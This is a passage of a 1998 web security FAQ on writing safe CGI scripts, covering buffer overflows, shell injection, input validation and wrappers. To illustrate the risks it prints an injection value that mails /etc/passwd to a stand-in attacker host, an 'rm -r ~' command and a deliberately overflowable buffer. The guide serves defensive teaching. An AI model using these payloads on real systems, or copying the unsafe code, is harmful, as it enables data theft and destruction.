CGI scripts can present security holes in two ways:
CGI scripts are potential security holes even though you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high-numbered port (it just needs to execute a few commands in Perl to accomplish this). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.
There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A cgi-bin directory with tightly-controlled access lessens the possibility of this happening.
First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.
Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:
    http://your-site/a/path/your_script.cgi~

(This is another good reason to limit CGI scripts to cgi-bin and to make sure that cgi-bin is separate from the document root.)
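One way to catch stray copies like this is to scan the document tree for file names that look like editor leftovers. The function below is only a sketch of such a name check: looks_like_backup() is a hypothetical helper, and the suffixes it recognizes (a trailing "~", Emacs-style "#name#" autosave files, ".bak" and ".orig") are an assumed starting list, not a complete one.

```c
#include <string.h>

/* Hypothetical helper: returns 1 if a file name looks like an editor
 * backup or autosave copy (name~, #name#, name.bak, name.orig), else 0. */
int looks_like_backup(const char *name)
{
    size_t len;
    const char *dot;

    if (name == NULL || (len = strlen(name)) == 0)
        return 0;
    if (name[len - 1] == '~')              /* backup copy: script.cgi~ */
        return 1;
    if (len >= 2 && name[0] == '#' && name[len - 1] == '#')
        return 1;                          /* autosave copy: #script.cgi# */
    dot = strrchr(name, '.');
    if (dot != NULL && (strcmp(dot, ".bak") == 0 || strcmp(dot, ".orig") == 0))
        return 1;
    return 0;
}
```

A cleanup job could call this on every file name under the document root and report or delete the matches.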
Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.
Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.
A third consideration is that the scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are poor choices for anything more than trivial CGI programs.
All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail show. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by other people than the author. Furthermore, Perl contains a number of built-in features that were designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make Perl scripts safer in some respects than the equivalent C program.
You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.
Things to think about when you examine a script:
Note that this bug only endangers your Web site if you have the search engine installed locally. It does not affect sites that link to Excite.com's search pages, or sites that are indexed by the Excite robot.
A worse problem is found in unpatched versions of EWS earlier than February 1998 (unfortunately, also called version 1.1). This bug involves the failure to check user-supplied parameters before passing them to the shell, allowing remote users to execute shell commands on the server host. The commands will be executed with the privileges of the Web server.
See http://www.excite.com/navigate/patches.html for more information and patches.
To my eternal chagrin, one of the buggy CGI scripts to be discovered is in nph-publish, a script that I wrote myself to allow HTML documents to be "published" to the Apache web server from a publish-savvy editor such as Netscape Navigator Gold. I didn't check user-provided pathnames correctly, potentially allowing the script to write files into places where they aren't allowed. If the server is run with too many privileges, this can cause big problems. If you use this script, please upgrade to version 1.2 or higher. The bug was discovered by Randal Schwartz (merlyn@stonehenge.com).
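As an illustration of the kind of pathname check involved, here is a minimal sketch in C. It is not the fix that went into nph-publish; is_safe_relative_path() is a hypothetical helper that assumes the script only ever wants paths relative to a fixed directory, and it does not look at symbolic links.

```c
#include <string.h>

/* Hypothetical check: accept only relative paths with no ".." component.
 * Returns 1 if the path is acceptable, 0 otherwise. */
int is_safe_relative_path(const char *path)
{
    const char *p;
    size_t n;

    if (path == NULL || path[0] == '\0' || path[0] == '/')
        return 0;                      /* missing, empty, or absolute */

    p = path;
    while (*p != '\0') {
        n = strcspn(p, "/");           /* length of the next component */
        if (n == 2 && p[0] == '.' && p[1] == '.')
            return 0;                  /* ".." would climb out of the tree */
        p += n;
        if (*p == '/')
            p++;                       /* skip the separator */
    }
    return 1;
}
```

A script would run this on the user-supplied name before joining it to its base directory, and refuse the request if the check fails.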
The holes in the second two scripts on the list were discovered by Paul Phillips (paulp@cerf.net), who also wrote the CGI security FAQ. The hole in the PHF (phone book) script was discovered by Jennifer Myers (jmyers@marigold.eecs.nwu.edu), and is representative of a potential security hole in all CGI scripts that use NCSA's util.c library. Here's a patch to fix the problem in util.c.
Reports of other buggy scripts will be posted here on an intermittent basis.
In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.
This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public; the CERT does issue alerts about buggy CGI scripts when it learns about them, and it's a good idea to subscribe to their mailing list, or to browse the alert archive from time to time (see the bibliography).
Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.
Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.
A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:
    #include <stdlib.h>
    #include <stdio.h>

    static char query_string[1024];

    char* read_POST() {
        int query_size;
        query_size=atoi(getenv("CONTENT_LENGTH"));
        fread(query_string,query_size,1,stdin);
        return query_string;
    }

The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.
Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If CONTENT_LENGTH is missing or negative, or there isn't enough memory to hold the input, it returns NULL:

    char* read_POST() {
        char* length = getenv("CONTENT_LENGTH");
        int query_size = (length != NULL) ? atoi(length) : -1;
        char* query_string = NULL;
        if (query_size >= 0)
            query_string = (char*) malloc((size_t) query_size + 1);
        if (query_string != NULL) {
            size_t n = fread(query_string,1,query_size,stdin);
            query_string[n] = '\0';   /* terminate what was actually read */
        }
        return query_string;
    }

Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
    #define MAXSTRINGLENGTH 255
    char myString[MAXSTRINGLENGTH + 1];        /* +1 for the terminating NUL */
    char* query = read_POST();
    assert(query != NULL);
    strncpy(myString,query,MAXSTRINGLENGTH);
    myString[MAXSTRINGLENGTH]='\0';            /* ensure string terminator */

(Note that the semantics of strncpy are nasty when the input string is MAXSTRINGLENGTH bytes long or longer: no terminator is written, leading to some necessary fiddling with the terminating NUL.)
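If you would rather not do that fiddling by hand, one alternative is to let snprintf() do the bounded copy, since it always terminates the destination and reports how long the full string would have been. The following is a sketch only; copy_bounded() is a hypothetical helper name, not a standard library function.

```c
#include <stdio.h>

/* Hypothetical helper: copy src into dst (dst_size bytes in total).
 * The result is always terminated. Returns 0 if the whole string fit,
 * -1 if it had to be truncated or the arguments were unusable. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    int needed;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    needed = snprintf(dst, dst_size, "%s", src);   /* never writes past dst_size */
    if (needed < 0 || (size_t) needed >= dst_size)
        return -1;                                 /* input was too long */
    return 0;
}
```

The return value lets the caller reject over-long input outright instead of silently working with a truncated copy.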
In C this includes the popen() and system() functions, both of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.
Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.
The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.
    $mail_to = &get_name_from_input; # read the address from form
    open (MAIL,"| /usr/lib/sendmail $mail_to");
    print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
    close MAIL;

The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wily hacker passes an e-mail address that looks like this?

    nobody@nowhere.com;mail badguys@hell.org</etc/passwd;

Now the open() statement will evaluate the following command:

    /usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.
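Where the program allows it, keep user-supplied data off the command line altogether. For example, sendmail's -t option tells it to take the recipient from the To: header of the message rather than from the command line, so the example above can be rewritten as:

    $mailto = &get_name_from_input; # read the address from form
    open (MAIL,"| /usr/lib/sendmail -t -oi");
    print MAIL <<END;
    To: $mailto
    From: me (me\@nowhere.com)
    Subject: nothing much

    Hi there!
    END
    close MAIL;

C programmers can use the exec family of commands to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.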
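Here is a minimal sketch of the exec approach in C. The helper name run_without_shell() is hypothetical; it uses the standard fork(), execv() and waitpid() calls, and because no shell is started, characters such as ";" and "<" in an argument reach the program as ordinary text.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run the program at `path` with the argument vector
 * `argv` (NULL-terminated, argv[0] is the program name) and wait for it.
 * No shell is involved, so metacharacters in the arguments are not
 * interpreted. Returns the exit status, or -1 on failure. */
int run_without_shell(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;                     /* could not create a child process */
    if (pid == 0) {
        execv(path, argv);             /* replaces the child on success */
        _exit(127);                    /* reached only if execv failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Called with the path "/bin/echo" and the hostile address from the earlier example as a single argument, this simply prints the address; nothing is mailed. Avoiding the shell does not make the called program safe, though: it still has to cope with whatever arguments it is handed.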
You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. The list of shell metacharacters is extensive:
    &;`'\"|*?~<>^()[]{}$\n\r

Notice that it contains the carriage return and newline characters, something that someone at NCSA forgot when he or she wrote the widely-distributed util.c library as an example of CGI scripting in C.
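A check for these characters takes only a few lines of C. In this sketch, has_shell_metachar() and SHELL_METACHARS are hypothetical names, and the string is simply the list above written as a C literal; rejecting input that fails the check is usually simpler to reason about than trying to strip the characters out.

```c
#include <string.h>

/* The metacharacters listed above, written as a C string literal. */
static const char SHELL_METACHARS[] = "&;`'\\\"|*?~<>^()[]{}$\n\r";

/* Hypothetical helper: returns 1 if s contains any shell metacharacter,
 * 0 if it contains none (or if s is NULL). */
int has_shell_metachar(const char *s)
{
    return s != NULL && strpbrk(s, SHELL_METACHARS) != NULL;
}
```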
It's a better policy to make sure that all user input arguments are exactly what you expect rather than blindly remove shell metacharacters and hope there aren't any unexpected side-effects. Even if you avoid the shell and pass user variables directly to a program, you can never be sure that they don't contain constructions that reveal holes in the programs you're calling.
For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:
    $mail_to = &get_name_from_input; # read the address from form
    # \z anchors at the very end; $ would also accept a trailing newline
    unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+\z/) {
        die 'Address not in form foo@nowhere.com';
    }

(This particular pattern match may be too restrictive for some sites. It doesn't allow UUCP-style addresses or any of the many alternative addressing schemes.)
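The same "accept only what you expect" test can be written in C without a regular expression library. This is a sketch that mirrors the pattern above for plain ASCII input; looks_like_address() and allowed_char() are hypothetical names.

```c
#include <ctype.h>
#include <stddef.h>

/* Is c one of the characters the pattern above allows: a letter, digit,
 * underscore, '.', '+' or '-'? */
static int allowed_char(unsigned char c)
{
    return isalnum(c) || c == '_' || c == '.' || c == '+' || c == '-';
}

/* Hypothetical helper: returns 1 if s has the form local@domain with one
 * or more allowed characters on each side of a single '@', else 0. */
int looks_like_address(const char *s)
{
    size_t i = 0, local_len, domain_len;

    if (s == NULL)
        return 0;
    while (allowed_char((unsigned char) s[i]))
        i++;
    local_len = i;
    if (local_len == 0 || s[i] != '@')
        return 0;
    i++;                                   /* skip the '@' */
    while (allowed_char((unsigned char) s[i]))
        i++;
    domain_len = i - local_len - 1;
    return domain_len > 0 && s[i] == '\0'; /* nothing may follow the domain */
}
```

Anything that is not an allowed character, including a semicolon, a space or a newline, causes the whole address to be rejected.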
Rather than relying on the PATH environment variable to locate a program, as in this fragment:

    system("ls -l /local/web/foo");

use this:

    system("/bin/ls -l /local/web/foo");

If you must rely on the PATH, set it yourself at the beginning of your CGI script:

    putenv("PATH=/bin:/usr/bin:/usr/local/bin");
In general it's not a good idea to put the current directory (".") into the path.
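A script that inherits its PATH can at least check it before use. The sketch below flags a PATH that searches the current directory; path_has_current_dir() is a hypothetical helper. It treats an empty entry (a leading, trailing or doubled colon) the same as ".", because an empty entry conventionally also means the current directory. Other relative entries such as "./tools" are not detected.

```c
#include <string.h>

/* Hypothetical helper: returns 1 if a PATH-style string searches the
 * current directory, either through a "." entry or through an empty
 * entry, else 0. An empty string counts as a single empty entry. */
int path_has_current_dir(const char *path)
{
    const char *p = path;
    size_t n;

    if (path == NULL)
        return 0;
    for (;;) {
        n = strcspn(p, ":");               /* length of this entry */
        if (n == 0 || (n == 1 && p[0] == '.'))
            return 1;
        if (p[n] == '\0')
            return 0;                      /* last entry checked */
        p += n + 1;                        /* move past the colon */
    }
}
```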
Nothing can automatically make CGI scripts completely safe, but you can make them safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the Unix chroot mechanism to place the script inside a restricted part of the file system.
There are a number of wrappers available for Unix systems:
cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.
However you should be aware that this type of wrapper does increase the risk to the individual user. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command:
rm -r ~
Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.
Another wrapper is sbox, written by the author. Like cgiwrap, it can run scripts as the CGI author's user and/or group. However, it takes additional steps to prevent CGI scripts from causing damage. For one thing, sbox optionally performs a chroot to a restricted directory, sealing the script off from the user's home directory and much of the rest of the file system. For another, you can use sbox to set resource allocation limitations on CGI scripts. This prevents certain denial-of-service attacks.
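To give a flavor of what a resource limit looks like at the system call level, here is a sketch that caps CPU time using the standard getrlimit() and setrlimit() calls. It is not taken from sbox; limit_cpu_seconds() is a hypothetical helper, and a real wrapper would set several limits (memory, file size, number of processes) in the child process just before executing the script.

```c
#include <sys/resource.h>

/* Hypothetical helper: set the soft CPU-time limit of the current process
 * to `seconds`, or to the hard limit if that is lower.
 * Returns 0 on success, -1 on failure. */
int limit_cpu_seconds(rlim_t seconds)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_CPU, &rl) != 0)
        return -1;
    if (rl.rlim_max != RLIM_INFINITY && seconds > rl.rlim_max)
        seconds = rl.rlim_max;             /* cannot exceed the hard limit */
    rl.rlim_cur = seconds;
    return setrlimit(RLIMIT_CPU, &rl) == 0 ? 0 : -1;
}
```

A script that runs past its soft CPU limit is sent SIGXCPU, which by default terminates it, so a runaway loop cannot tie up the server indefinitely.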
When running under the Unix version of Apache, sbox supports user-maintained directories and virtual hosts.
When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.
    http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt

This document contains a great deal of useful advice, but has not been updated since September 1995. More recently, Selena Sol has published an excellent article on the risks of installing pre-built CGI scripts, with much helpful advice on configuring and customizing these scripts to increase their security. This article can be found at:

    http://Stars.com/Authoring/Scripting/Security/

An excellent all-round introduction to Perl and CGI Scripting can be found in the Perl CGI FAQ,

    http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html

written by Tom Christiansen (tchrist@perl.com) and Shishir Gundavaram (shishir@ora.com).
Lincoln D. Stein (lstein@cshl.org)
Last modified: Sun Dec 20 13:23:15 MET 1998